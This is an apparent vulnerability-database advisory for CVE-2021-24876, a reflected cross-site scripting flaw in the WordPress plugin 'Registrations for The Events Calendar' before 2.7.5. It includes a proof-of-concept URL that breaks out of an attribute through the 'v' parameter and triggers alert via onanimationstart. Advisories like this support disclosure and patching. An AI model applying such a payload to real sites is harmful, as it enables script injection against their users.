Lucene search
JrXnmWPEX-ID:E77C2493-993D-418D-9629-A1F07B5A2B6FHistoryOct 27, 2021 - 12:00 a.m.
Registrations for The Events Calendar < 2.7.5 - Reflected Cross-Site Scripting
2021-10-2700:00:00
JrXnm
228
0.001 Low
EPSS
Percentile
41.4%
The plugin does not escape the v parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=registrations-for-the-events-calendar&tab=registrations&v="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//Related
patchstack
patchstack
prion
prion
Cross site scripting
2021-11-29 09:15:00
cve
cve
CVE-2021-24876
2021-11-29 09:15:07
cvelist
cvelist
nvd
nvd
CVE-2021-24876
2021-11-29 09:15:07
wpvulndb
wpvulndb